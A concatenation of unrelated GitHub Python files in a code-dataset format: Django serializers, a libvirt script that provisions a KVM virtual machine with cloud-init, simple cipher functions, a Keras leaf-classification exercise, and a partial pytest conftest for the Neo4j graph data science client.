Meta:\n model = Product\n fields = '__all__'\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n user = CustomerSerializer()\n\n class Meta:\n model = Review\n fields = '__all__'\n\n\nclass ReviewAddSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Review\n fields = '__all__'\n\nclass ListAllReviewsGivenSerializer(serializers.ModelSerializer):\n movie = ProductCreateSerializer()\n\n class Meta:\n model = Review\n fields = '__all__'\n\n\nclass SavedMoviesSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = SavedMovies\n fields = '__all__'\n\n\nclass SavedMovieListsSerializer(serializers.ModelSerializer):\n movie = ProductRetriveSerializer()\n\n class Meta:\n model = SavedMovies\n fields = '__all__'\n\n\nclass NotificationAddSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Notification\n fields = '__all__'","repo_name":"deekshi-hari/theweedoc-backend","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41299131368","text":"# Create VM is a multi-step process:\n# TODO: update this list to reflect new functionalities that is added after the process is written\n# - create a disk OR copy a pre-configured VM OR create a disk pool and create a volume\n# - can also use filesystem-specific cloning features like ZFS or LVM snapshots\n# - resize the disk to appropriate sizes\n# - create Cloud-Init definitions eg: user, filesystem, packages, update\n# - optionally create custom networks rather than DHCP\n# - ~~deploy Cloud-Init configs either using `cloud-localds` or deploy to a webserver~~ NO NEED. WE HAVE `nocloud-net`\n# - create VM definitions on libvirt using libvirt Python API (oh lord pls no)\n# - define into libvirt to be registered\n# - start the VM\n\n# It would be nice if we can boot to network, reboot and return to normal boot sequence but eh\nfrom jinja2 import FileSystemLoader, Environment, select_autoescape\nimport subprocess\nimport libvirt\nfrom xml.etree import ElementTree\nfrom uuid import uuid4\n\n# String definitions\nERR_POOL_NOT_FOUND = 'Pool \"{}\" is not found.'\nERR_VOLUME_NOT_FOUND = 'Volume \"{}\" is not found in pool \"{}\".'\nERR_DOMAIN_NOT_FOUND = 'Domain \"{}\" is not found.'\n\n# Parameters\nLIBVIRT_URI = 'qemu+ssh://chong601@10.102.0.5/system'\nMEGABYTES = 1024**2\nGIGABYTES = 1024**3\n\nDOMAIN_NAME = 'vm-ubuntu-focal-cloud-init-test-4'\nCLOUD_DS = 'ds=nocloud-net;s=http://{}:{}/{}/'\nDISK_NAME = 'disk-2.img'\nDISK_TYPE = 'qcow2'\nDISK_CAPACITY = 100*GIGABYTES\n\nHOST_FILESYSTEM = 'zfs'\nPOOL_NAME = 'vm-ubuntu-focal-cloud-init-test-4'\nPOOL_TYPE = 'dir'\nTARGET_PATH = '/zfs-storage-test/kvm-area/{}'.format(DOMAIN_NAME)\nPOOL_AUTOSTART = 1\nZFS_IS_DATASET = True\n\nEMULATION_TYPE = 'kvm'\nMEMORY_CAPACITY = 4\nMAX_MEMORY_CAPACITY = 16\nPROVISIONED_CPU_COUNT = 4\nHOST_CPU_COUNT = 24\nVM_UUID = str(uuid4())\nSOCKET_COUNT = 1\nCORE_COUNT = 24\nTHREAD_COUNT = 1\n\n# Internal definitions\nENABLED_ESCAPES = ['html', 'xml']\nDS_HOST = '10.102.7.97'\nDS_PORT = '5000'\nfinal_smbios_data = CLOUD_DS.format(DS_HOST, DS_PORT, VM_UUID)\nBIOS_VENDOR = 'NoCloud-libvirt-QEMU-KVM'\nVNC_PORT = -1\nVNC_LISTEN_IP = '0.0.0.0'\nDISK_PATH = '/zfs-storage-test/kvm-area'\nIMAGE_NAME = 'focal-server-cloudimg-amd64.img'\nj2_env = Environment(\n loader=FileSystemLoader('templates'),\n autoescape=select_autoescape(ENABLED_ESCAPES),\n trim_blocks=True,\n lstrip_blocks=True\n)\n\nprint('Connecting to libvirt host at {}...'.format(LIBVIRT_URI))\nclient = libvirt.open(LIBVIRT_URI)\nprint('libvirt host \"{}\" connected.'.format(client.getHostname()))\n# Clone the VM pool\n# TODO: Paramiko integration\n# subprocess.run([])\n\n# Create a new pool\n# TODO: write pool storage code\n# XML GENERATION TIME *shudders*\nprint('Generating new pool definition for pool name {}...'.format(POOL_NAME))\npool_attr = {'type': POOL_TYPE}\npool_root = ElementTree.Element('pool', pool_attr)\npool_name = ElementTree.SubElement(pool_root, 'name').text = POOL_NAME\npool_target = ElementTree.SubElement(pool_root, 'target')\npool_target_path = ElementTree.SubElement(pool_target, 'path').text = TARGET_PATH\n\npool_xml = ElementTree.tostring(pool_root, 'unicode')\nprint(pool_xml)\nprint('Pool definition complete.')\nprint('Informing {} to create pool \"{}\"...'.format(client.getHostname(), POOL_NAME))\nclient.storagePoolDefineXML(pool_xml)\nprint('Pool {} is create at {}.'.format(POOL_NAME, client.getHostname()))\n\nprint('Informing {} to set pool \"{}\" to autostart...'.format(client.getHostname(), POOL_NAME))\npool_obj = client.storagePoolLookupByName(POOL_NAME)\npool_obj.setAutostart(POOL_AUTOSTART)\nprint('Pool {} at {} autostarted'.format(POOL_NAME, client.getHostname()))\n\n# Define a new volume for libvirt to monitor\nprint('Generating definitions for volume {}\"...'.format(DISK_NAME))\nvolume = ElementTree.Element('volume')\nname = ElementTree.SubElement(volume, 'name').text = DISK_NAME\ncapacity = ElementTree.SubElement(volume, 'capacity').text = str(DISK_CAPACITY)\ntarget = ElementTree.SubElement(volume, 'target')\n# format_attr has type which is the type of disk to create eg: raw, bochs, qcow, qcow2, qed, vmdk\nformat_attr = {'type': DISK_TYPE}\ndisk_format = ElementTree.SubElement(target, 'format', format_attr)\n\n\n\n# TODO: look into key\ndef call_qemu_img(self, source, dest, target_disk_format, disk_capacity, allocation_method):\n subprocess.run([])\n\n\nvolume_xml = ElementTree.tostring(volume, 'unicode')\nprint(volume_xml)\npool = client.storagePoolLookupByName(POOL_NAME)\nprint('Generation complete.')\n\nprint('Adding volume \"{}\" to pool \"{}\" at \"{}\"'.format(DISK_NAME, POOL_NAME, client.getHostname()))\n# WARNING: ZFS DO NOT support falloc method of disk allocation\n# TODO: add more disk type for other filesystems\nif DISK_TYPE == 'qcow2':\n if HOST_FILESYSTEM == 'zfs' and ZFS_IS_DATASET:\n # TODO: ZFS-specific metadata preallocation\n # FUCK YOU LIBVIRT\n # call_qemu_img(source,dest,target_disk_format,disk_capacity,'metadata')\n try:\n pool = client.storagePoolLookupByName(POOL_NAME)\n except libvirt.libvirtError:\n print(ERR_POOL_NOT_FOUND.format(POOL_NAME))\n exit(1)\n if pool.isActive() == libvirt.VIR_STORAGE_POOL_INACTIVE:\n pool.create()\n volume_libvirt = pool.createXML(volume_xml)\n else:\n volume_libvirt = pool.createXML(volume_xml)\nelse:\n print(\"Storage type is not implemented (yet)\")\nprint('Volume \"{}\" is created on pool \"{}\" at \"{}\"'.format(DISK_NAME, POOL_NAME, client.getHostname()))\n# Expand the disk to appropriate size\n# TODO: write vol-resize code\nprint('Informing host \"{}\" to resize volume \"{}\" to {} bytes...'.format(client.getHostname(), DISK_NAME, DISK_CAPACITY))\npool = disk = None\n\ntry:\n pool = client.storagePoolLookupByName(POOL_NAME)\nexcept libvirt.libvirtError:\n print(ERR_POOL_NOT_FOUND.format(POOL_NAME))\n exit(1)\nif pool.isActive() == libvirt.VIR_STORAGE_POOL_INACTIVE:\n pool.create()\ntry:\n disk = pool.storageVolLookupByName(DISK_NAME)\nexcept libvirt.libvirtError:\n print(ERR_VOLUME_NOT_FOUND.format(DISK_NAME, POOL_NAME))\n exit(1)\n\n# From libvirt volume resize documentation:\n#\n# > Normally, the operation treats @capacity as the new size in bytes;\n# > but if @flags contains VIR_STORAGE_VOL_RESIZE_DELTA,\n# > then @capacity represents the size difference to add to the current size.\n# > It is up to the storage pool implementation whether unaligned requests\n# > are rounded up to the next valid boundary, or rejected.\n#\n# OK libvirt, you do you I guess.\n# This is the right place to use absolute size resizing.\n# TODO: do proper size checks before blindly resizing them\ndisk.resize(DISK_CAPACITY, libvirt.VIR_STORAGE_VOL_RESIZE_DELTA)\nprint('Volume resize done.')\n\n# Generate domain XML\n# TODO: complete Jinja2 XML implementation\n# LAZINESS SUCK. Even if I have Jinja2 imports included LOL.`\n\n# Define in libvirt\n# TODO: write define domain code\n# ALSO TODO: MAKE THIS DOMAIN XML THING A CLASS OF ITSELF. I HATE HOW IT LOOKS RIGHT NOW.\n# oooooooooooooooooooooooooooooooooooooooh fuck me why do I have to go through this...\n# This kind of code is I guess why we have so many bad developers out there, but to be honest:\n# - XML is hateful\n# - XML APIs forced me to do this\n# - the fact that libvirt **ENFORCES** the need to use XML which is just asinine\nprint('Generating domain definition for domain \"{}\"...'.format(DOMAIN_NAME))\ndomain_attr = {'type': EMULATION_TYPE}\nxml_domain = ElementTree.Element('domain', domain_attr)\nxml_name = ElementTree.SubElement(xml_domain, 'name').text = DOMAIN_NAME\nxml_uuid = ElementTree.SubElement(xml_domain, 'uuid').text = VM_UUID\n# Memory attributes are **strictly** required because it defaults to KiB\n# 10/10 libvirt, assuming that people actually use KiB to define memory.\nmemory_attr = {'unit': 'GiB'}\nxml_memory = ElementTree.SubElement(xml_domain, 'memory', memory_attr).text = str(MAX_MEMORY_CAPACITY)\ncurrent_memory_attr = {'unit': 'GiB'}\nxml_current_memory = ElementTree.SubElement(xml_domain, 'currentMemory', current_memory_attr).text = str(MEMORY_CAPACITY)\nvcpu_attr = {'current': str(PROVISIONED_CPU_COUNT)}\nxml_vcpu = ElementTree.SubElement(xml_domain, 'vcpu', vcpu_attr).text = str(HOST_CPU_COUNT)\nxml_os = ElementTree.SubElement(xml_domain, 'os')\nos_smbios_attr = {'mode': 'sysinfo'}\nxml_os_smbios = ElementTree.SubElement(xml_os, 'smbios', os_smbios_attr)\nos_type_attr = {'arch': 'x86_64', 'machine': 'q35'}\nxml_os_type = ElementTree.SubElement(xml_os, 'type', os_type_attr).text = 'hvm'\nos_boot_attr = {'dev': 'hd'}\nxml_os_boot = ElementTree.SubElement(xml_os, 'boot', os_boot_attr)\nsysinfo_attr = {'type': 'smbios'}\nxml_sysinfo = ElementTree.SubElement(xml_domain, 'sysinfo', sysinfo_attr)\nxml_sysinfo_bios = ElementTree.SubElement(xml_sysinfo, 'bios')\nsysinfo_bios_vendor_attr = {'name': 'vendor'}\nxml_sysinfo_bios_entry = ElementTree.SubElement(xml_sysinfo_bios, 'entry', sysinfo_bios_vendor_attr).text = BIOS_VENDOR\nxml_sysinfo_system = ElementTree.SubElement(xml_sysinfo, 'system')\nsysinfo_system_manufacturer_attr = {'name': 'manufacturer'}\nxml_sysinfo_system_manufacturer = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_manufacturer_attr).text = 'KVM'\nsysinfo_system_product_attr = {'name': 'product'}\nxml_sysinfo_system_product = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_product_attr).text = 'libvirt-virt-manager'\nsysinfo_system_version_attr = {'name': 'version'}\nxml_sysinfo_system_version = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_version_attr).text = '0.1-alpha'\nsysinfo_system_serial_attr = {'name': 'serial'}\nxml_sysinfo_system_serial = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_serial_attr).text = final_smbios_data\nxml_sysinfo_chassis = ElementTree.SubElement(xml_sysinfo, 'chassis')\nsysinfo_chassis_manufacturer_attr = {'name': 'manufacturer'}\nxml_sysinfo_chassis_manufacturer = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_manufacturer_attr).text = 'Dell'\nsysinfo_chassis_product_attr = {'name': 'product'}\nxml_sysinfo_chassis_product = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_product_attr).text = 'PowerEdge R710'\nsysinfo_chassis_version_attr = {'name': 'version'}\nxml_sysinfo_chassis_version = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_version_attr).text = '1.0'\nsysinfo_chassis_serial_attr = {'name': 'serial'}\nxml_sysinfo_chassis_serial = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_serial_attr).text = 'H42H32S'\nxml_features = ElementTree.SubElement(xml_domain, 'features')\nxml_features_acpi = ElementTree.SubElement(xml_features, 'acpi')\nxml_features_apic = ElementTree.SubElement(xml_features, 'apic')\ncpu_attr = {'mode': 'host-model'}\nxml_cpu = ElementTree.SubElement(xml_domain, 'cpu', cpu_attr)\ncpu_topology_attr = {'sockets': str(SOCKET_COUNT), 'cores': str(CORE_COUNT), 'threads': str(THREAD_COUNT)}\nxml_cpu_topology = ElementTree.SubElement(xml_cpu, 'topology', cpu_topology_attr)\nclock_attr = {'offset': 'utc'}\nxml_clock = ElementTree.SubElement(xml_domain, 'clock', clock_attr)\nclock_timer_rtc_attr = {'name': 'rtc', 'tickpolicy': 'catchup'}\nxml_clock_timer_rtc = ElementTree.SubElement(xml_clock, 'timer', clock_timer_rtc_attr)\nclock_timer_pit_attr = {'name': 'pit', 'tickpolicy': 'delay'}\nxml_clock_timer_pit = ElementTree.SubElement(xml_clock, 'timer', clock_timer_pit_attr)\nclock_timer_hpet_attr = {'name': 'hpet', 'present': 'no'}\nxml_clock_timer_hpet = ElementTree.SubElement(xml_clock, 'timer', clock_timer_hpet_attr)\nxml_pm = ElementTree.SubElement(xml_domain, 'pm')\npm_suspend_mem_attr = {'enabled': 'no'}\nxml_pm_suspend_mem = ElementTree.SubElement(xml_pm, 'suspend-to-mem', pm_suspend_mem_attr)\npm_suspend_disk_attr = {'enabled': 'no'}\nxml_pm_suspend_disk = ElementTree.SubElement(xml_pm, 'suspend-to-disk', pm_suspend_disk_attr)\nxml_devices = ElementTree.SubElement(xml_domain, 'devices')\n# Do we need to define an emulator to use? Hopefully not.\n# I am not stoked on hardcoding path to the emulator...\n# Putting this in just in case if libvirt just doesn't wanna cooperate at all\n# xml_devices_emulator = ElementTree.SubElement(xml_devices, 'emulator').text = EMULATOR_PATH\ndevices_disk_attr = {'type': 'file', 'device': 'disk'}\nxml_devices_disk = ElementTree.SubElement(xml_devices, 'disk', devices_disk_attr)\ndevices_disk_driver_attr = {'name': 'qemu', 'type': 'qcow2', 'discard': 'unmap'}\nxml_devices_disk_driver = ElementTree.SubElement(xml_devices_disk, 'driver', devices_disk_driver_attr)\ndevices_disk_source_attr = {'file': '{}/{}/{}'.format(DISK_PATH, DOMAIN_NAME, IMAGE_NAME)}\nxml_devices_disk_source = ElementTree.SubElement(xml_devices_disk, 'source', devices_disk_source_attr)\ndevices_disk_target_attr = {'dev': 'sda', 'bus': 'scsi'}\nxml_devices_disk_target = ElementTree.SubElement(xml_devices_disk, 'target', devices_disk_target_attr)\ndevices_controller_scsi_attr = {'type': 'scsi', 'model': 'virtio-scsi'}\nxml_devices_controller_scsi = ElementTree.SubElement(xml_devices, 'controller', devices_controller_scsi_attr)\ndevices_controller_usb_attr = {'type': 'usb', 'model': 'qemu-xhci', 'ports': '15'}\nxml_devices_controller_usb = ElementTree.SubElement(xml_devices, 'controller', devices_controller_usb_attr)\ndevices_interface_attr = {'type': 'network'}\nxml_devices_interface = ElementTree.SubElement(xml_devices, 'interface', devices_interface_attr)\ndevices_interface_source_attr = {'network': 'default'}\nxml_devices_interface_source = ElementTree.SubElement(xml_devices_interface, 'source', devices_interface_source_attr)\ndevices_interface_model_attr = {'type': 'virtio'}\nxml_devices_interface_model = ElementTree.SubElement(xml_devices_interface, 'model', devices_interface_model_attr)\ndevices_console_type_attr = {'type': 'pty'}\nxml_devices_console_type = ElementTree.SubElement(xml_devices, 'console', devices_console_type_attr)\ndevices_channel_attr = {'type': 'unix'}\nxml_devices_channel = ElementTree.SubElement(xml_devices, 'channel', devices_channel_attr)\ndevices_channel_source_attr = {'mode': 'bind'}\nxml_devices_channel_source = ElementTree.SubElement(xml_devices_channel, 'source', devices_channel_source_attr)\nchannel_target_attr = {'type': 'virtio', 'name': 'org.qemu.guest_agent.0'}\nxml_channel_target = ElementTree.SubElement(xml_devices_channel, 'target', channel_target_attr)\ndevices_input_attr = {'type': 'tablet', 'bus': 'usb'}\ndevices_xml_input = ElementTree.SubElement(xml_devices, 'input', devices_input_attr)\ndevices_graphics_attr = {'type': 'vnc', 'port': str(VNC_PORT), 'listen': VNC_LISTEN_IP}\nxml_devices_graphics = ElementTree.SubElement(xml_devices, 'graphics', devices_graphics_attr)\nxml_devices_video = ElementTree.SubElement(xml_devices, 'video')\ndevices_video_model_attr = {'type': 'qxl'}\nxml_devices_video_model = ElementTree.SubElement(xml_devices_video, 'model', devices_video_model_attr)\ndevices_memballoon_attr = {'model': 'virtio'}\ndevices_xml_memballoon = ElementTree.SubElement(xml_devices, 'memballoon', devices_memballoon_attr)\ndevices_rng_attr = {'model': 'virtio'}\nxml_devices_rng = ElementTree.SubElement(xml_devices, 'rng', devices_rng_attr)\ndevices_rng_backend_attr = {'model': 'random'}\nxml_devices_rng_backend = ElementTree.SubElement(xml_devices_rng, 'backend', devices_rng_backend_attr).text = '/dev/urandom'\n\nxml_str = ElementTree.tostring(xml_domain, 'unicode')\nprint('Generation complete.')\nprint('Defining domain {} at {}'.format(DOMAIN_NAME, client.getHostname()))\ndomain = client.defineXML(xml_str)\n\n\n# Get UUID\n# TODO: write getUUID() code\n# This is fucking broken logic. I hate it. And UUID is already defined up there so this is completely useless\ntry:\n domain_obj = client.lookupByName(DOMAIN_NAME)\n domain_uuid = domain_obj.UUID()\nexcept libvirt.libvirtError:\n print(ERR_DOMAIN_NOT_FOUND.format(DOMAIN_NAME))\n exit(1)\n\n\n# Set SMBIOS data\n# FIXME: can be combined into \"Generate domain XML\" section\n# Absolute cancer.\n# Why I need to do it this way.\n#\n# Also, already done above.\n\n\n# Generate user-data\n# TODO: Create sample helper code to expose user-data\n# ALSO TODO: Move to ruamel.yaml if don't want to use `#cloud-config` line hack\n# Cue the world's possibly drunkest and most hacky way to generate YAML.\n\n#cloud-config\n# name: chong601\n# password: chong601\n# chpasswd: {expire: False}\n# ssh_pwauth: True\n# hostname: vm-ubuntu-focal-lxd-cluster-3\n# timezone: \"Asia/Kuala_Lumpur\"\n# package_update: true\n# package_upgrade: true\n# package_reboot_if_required: true\n# packages:\n# - qemu - guest - agent\n# - haveged\n# power_state:\n# delay: now\n# mode: reboot\n# message: \"Cloud-config for vm-ubuntu-focal-lxd-cluster-3 is completed. Restarting...\"\n# timeout: 15\n# condition: True\n# system_info:\n# default_user:\n\n# Generate meta-data\n# TODO: Create sample helper code to expose user-data\n\n# Generate network data\n# TODO: Figure out how to present networking data on nocloud-net Cloud-Init\n\n# Store in DB\n# TODO: long long time layer\n\n# Start domain\n# TODO: write domain lifecycle code\nprint('Starting domain {} at {}'.format(DOMAIN_NAME, client.getHostname()))\ndomain.create()\nprint('Domain {} is started at {}'.format(DOMAIN_NAME, client.getHostname()))","repo_name":"chong601/NoCloud","sub_path":"nocloud/domain_instance/create_vm.py","file_name":"create_vm.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"94"} +{"seq_id":"10452532887","text":"\n\ndef code_letter_atbash(c):\n if 'a' <= c and c <= 'z':\n result = chr(ord('z')-(ord(c)-ord('a')))\n elif 'A' <= c and c <= 'Z':\n result = chr(ord('Z')-(ord(c)-ord('A')))\n else:\n result = c\n return result\n\ndef coder_atbash(message):\n result = ''\n for c in message:\n result = result + code_letter_atbash(c)\n return result\n\ndef decoder_atbash(message):\n return coder_atbash(message)\n\ndef decoder_transposition(message):\n result = ''\n med = len(message)//2 + len(message)%2\n for i in range(med-1):\n result = result + message[i]+message[med+i]\n result = result + message[med-1]\n if len(message)%2 ==0:\n result = result + message[len(message)-1]\n return result\n\ndef coder_transposition(message):\n result = ''\n for i in range(0,len(message),2):\n result = result + message[i]\n for i in range(1,len(message),2):\n result = result + message[i]\n return result\n","repo_name":"LuisLlana/prpa","sub_path":"practicas/p2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"69832552310","text":"# yaprak sınıflandırması (1DESA)\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n# test ve eğitim verilerinin okunması\ntrain = pd.read_csv('datasets/leaf-classification/train.csv')\ntest = pd.read_csv('datasets/leaf-classification/test.csv')\n\n# sınıfların belirlenmesi ve etiketlenmesi\nlabel_encoder = LabelEncoder().fit(train.species)\nlabels = label_encoder.transform(train.species)\nclasses = list(label_encoder.classes_)\n\n# verilerin hazırlanması, özellik ve sınıf sayısının belirlenmesi\ntrain = train.drop(['id', 'species'], axis=1)\ntest = test.drop(['id'], axis=1)\nnb_features = 192\nnb_classes = len(classes)\n\n\n# eğitim verisindeki verilerin standartlaştırılması\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler().fit(train.values)\ntrain = scaler.transform(train.values)\n\n# eğitim verisinin eğitim ve doğrulama için ayarlanması\nfrom sklearn.model_selection import train_test_split\nX_train, X_valid, y_train, y_valid = train_test_split(train, labels, test_size=0.2)\n\n# etiketlerin kategorilerinin belirlenmesi\n#from tensorflow.keras.utils import to_categorical\nfrom keras.utils import to_categorical\ny_train = to_categorical(y_train)\ny_valid = to_categorical(y_valid)\n\n# giriş verilerinin boyutlarının ayarlanması\nX_train = np.array(X_train).reshape(-1, nb_features, 1)\nX_valid = np.array(X_valid).reshape(-1, nb_features, 1)\n\n# 1DESA modelinin oluşturulması\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv1D, Flatten, MaxPooling1D, Dropout, Activation\n\nmodel=Sequential()\nmodel.add(Conv1D(512,1,input_shape=(nb_features,1)))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling1D(2))\nmodel.add(Conv1D(256,1))\nmodel.add(MaxPooling1D(2))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(2048,activation=\"relu\"))\nmodel.add(Dense(1024,activation=\"relu\"))\nmodel.add(Dense(nb_classes,activation=\"softmax\"))\nmodel.summary()\n\n#Ağın derlenmesi\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=\"adam\",metrics=[\"accuracy\"])\n\n#Modelin eğitilmesi\nmodel.fit(X_train,y_train,epochs=15,validation_data=(X_valid,y_valid))\n\n\n#Ortalama değerlerin gösterilmesi\nprint((\"Ortalama eğitim kaybı:\",np.mean(model.history.history[\"loss\"])))\nprint((\"Ortalama eğitim başarımı:\",np.mean(model.history.history[\"accuracy\"])))\nprint((\"Ortalama doğrulama kaybı:\",np.mean(model.history.history[\"val_loss\"])))\nprint((\"Ortalama doğrulama başarımı:\",np.mean(model.history.history[\"val_accuracy\"])))\n\n#Değerlerin grafik üzerinde gösterilmesi\nimport matplotlib.pyplot as plt\nfig,(ax1,ax2)=plt.subplots(2,1,figsize=(15,15))\nax1.plot(model.history.history[\"loss\"],color=\"g\",label=\"Eğitimkaybı\")\nax1.plot(model.history.history[\"val_loss\"],color=\"y\",label=\"Doğrulama kaybı\")\nax1.set_xticks(np.arange(20,100,20))\nax2.plot(model.history.history[\"accuracy\"],color=\"b\",label=\"Eğitim başarımı\")\nax2.plot(model.history.history[\"val_accuracy\"],color=\"r\",label=\"Doğrulama başarımı\")\nax1.set_xticks(np.arange(20,100,20))\nplt.legend()\nplt.show()\n\n\n# F1-skor, kesinlik (precision), duyarlılık (sensitivity) ve özgüllük (specificity) değerlerini bulunuz\n\n#f1 skoru\nfrom sklearn.metrics import f1_score\ny_pred = model.predict(X_valid)\ny_pred = np.argmax(y_pred, axis=1)\ny_valid = np.argmax(y_valid, axis=1)\nf1 = f1_score(y_valid, y_pred, average='macro')\nprint('F1 skoru: %f' % f1)\n\n#kesinlik\nfrom sklearn.metrics import precision_score\nprecision = precision_score(y_valid, y_pred, average='macro')\nprint('Kesinlik: %f' % precision)\n\n#duyarlılık\nfrom sklearn.metrics import recall_score\nrecall = recall_score(y_valid, y_pred, average='macro')\nprint('Duyarlılık: %f' % recall)\n\n#özgüllük\nfrom sklearn.metrics import confusion_matrix\ntn, fp, fn, tp = confusion_matrix(y_valid, y_pred).ravel()\nspecificity = tn / (tn+fp)\nprint('Özgüllük: %f' % specificity)\n\n\n\n\n\n","repo_name":"ilker-yilmaz/artificial-intelligence-lab","sub_path":"week-8.py","file_name":"week-8.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"3045448365","text":"import os\nfrom pathlib import Path\nfrom typing import Any, Generator, Optional\n\nimport pytest\nfrom neo4j import Driver, GraphDatabase\n\nfrom graphdatascience.graph_data_science import GraphDataScience\nfrom graphdatascience.query_runner.aura_db_arrow_query_runner import (\n AuraDbConnectionInfo,\n)\nfrom graphdatascience.query_runner.neo4j_query_runner import Neo4jQueryRunner\nfrom graphdatascience.server_version.server_version import ServerVersion\n\nURI = os.environ.get(\"NEO4J_URI\", \"bolt://localhost:7687\")\nURI_TLS = os.environ.get(\"NEO4J_URI\", \"bolt+ssc://localhost:7687\")\n\nAUTH = (\"neo4j\", \"password\")\nif os.environ.get(\"NEO4J_USER\"):\n AUTH = (\n os.environ.get(\"NEO4J_USER\", \"DUMMY\"),\n os.environ.get(\"NEO4J_PASSWORD\", \"neo4j\"),\n )\n\nDB = os.environ.get(\"NEO4J_DB\", \"neo4j\")\n\nAURA_DB_URI = os.environ.get(\"NEO4J_AURA_DB_URI\", \"bolt://localhost:7689\")\nAURA_DB_AUTH = (\"neo4j\", \"password\")\n\n\n@pytest.fixture(scope=\"package\")\ndef neo4j_driver() -> Generator[Driver, None, None]:\n driver = GraphDatabase.driver(URI, auth=AUTH)\n\n yield driver\n\n driver.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef runner(neo4j_driver: Driver) -> Generator[Neo4jQueryRunner, None, None]:\n _runner = Neo4jQueryRunner(neo4j_driver)\n _runner.set_database(DB)\n\n yield _runner\n\n _runner.close()\n\n\n@pytest.fixture(scope=\"package\", autouse=False)\ndef auradb_runner() -> Generator[Neo4jQueryRunner, None, None]:\n driver = GraphDatabase.driver(AURA_DB_URI, auth=AURA_DB_AUTH)\n\n _runner = Neo4jQueryRunner(driver)\n _runner.set_database(DB)\n\n yield _runner\n\n driver.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds() -> Generator[GraphDataScience, None, None]:\n _gds = GraphDataScience(URI, auth=AUTH)\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds_with_tls() -> Generator[GraphDataScience, None, None]:\n integration_test_dir = Path(__file__).resolve().parent\n cert = os.path.join(integration_test_dir, \"resources\", \"arrow-flight-gds-test.crt\")\n\n with open(cert, \"rb\") as f:\n root_ca = f.read()\n\n _gds = GraphDataScience(\n URI_TLS,\n auth=AUTH,\n arrow=True,\n arrow_disable_server_verification=True,\n arrow_tls_root_certs=root_ca,\n )\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds_without_arrow() -> Generator[GraphDataScience, None, None]:\n _gds = GraphDataScience(URI, auth=AUTH, arrow=False)\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\", autouse=False)\ndef gds_with_cloud_setup(request: pytest.FixtureRequest) -> Optional[Generator[GraphDataScience, None, None]]:\n if \"cloud_architecture\" not in request.keywords:\n _gds = GraphDataScience(\n URI, auth=AUTH, arrow=True, aura_db_connection_info=AuraDbConnectionInfo(AURA_DB_URI, AURA_DB_AUTH)\n )\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n return None\n\n\n@pytest.fixture(autouse=True)\ndef clean_up(gds: GraphDataScience) -> Generator[None, None, None]:\n yield\n\n res = gds.graph.list()\n for graph_name in res[\"graphName\"]:\n gds.graph.get(graph_name).drop(failIfMissing=True)\n\n res = gds.pipeline.list() if gds.server_version() >= ServerVersion(2, 5, 0) else gds.beta.pipeline.list()\n for pipeline_name in res[\"pipelineName\"]:\n gds.pipeline.get(pipeline_name).drop(failIfMissing=True)\n\n if gds.server_version() >= ServerVersion(2, 5, 0):\n model_names = gds.model.list()[\"modelName\"]\n else:\n model_names = gds.beta.model.list()[\"modelInfo\"].apply(func=lambda row: row[\"modelName\"])\n\n for model_name in model_names:\n model = gds.model.get(model_name)\n if model.stored():\n if gds.server_version() >= ServerVersion(2, 5, 0):\n gds.model.delete(model)\n else:\n gds.alpha.model.delete(model)\n if model.exists():\n model.drop(failIfMissing=True)\n\n gds.run_cypher(\"MATCH (n) DETACH DELETE (n)\")\n\n\ndef pytest_collection_modifyitems(config: Any, items: Any) -> None:\n if config.getoption(\"--target-aura\"):\n skip_on_aura = pytest.mark.skip(reason=\"skipping since targeting AuraDS\")\n for item in items:\n if \"skip_on_aura\" in item.keywords:\n item.add_marker(skip_on_aura)\n else:\n skip_not_aura = pytest.mark.skip(reason=\"skipping since not targeting AuraDS\")\n for item in items:\n if \"only_on_aura\" in item.keywords:\n item.add_marker(skip_not_aura)\n\n if not config.getoption(\"--include-ogb\"):\n skip_ogb_only = pytest.mark.skip(reason=\"need --include-ogb option to run\")\n for item in items:\n if \"ogb\" in item.keywords:\n item.add_marker(skip_ogb_only)\n\n if not config.getoption(\"--include-enterprise\"):\n skip_enterprise = pytest.mark.skip(reason=\"need --include-enterprise option to run\")\n for item in items:\n if \"enterprise\" in item.keywords:\n item.add_marker(skip_enterprise)\n\n # `encrypted` includes marked tests and excludes everything else\n if config.getoption(\"--encrypted-only\"):\n skip_encrypted_only = pytest.mark.skip(reason=\"not marked as `encrypted_only`\")\n for item in items:\n if 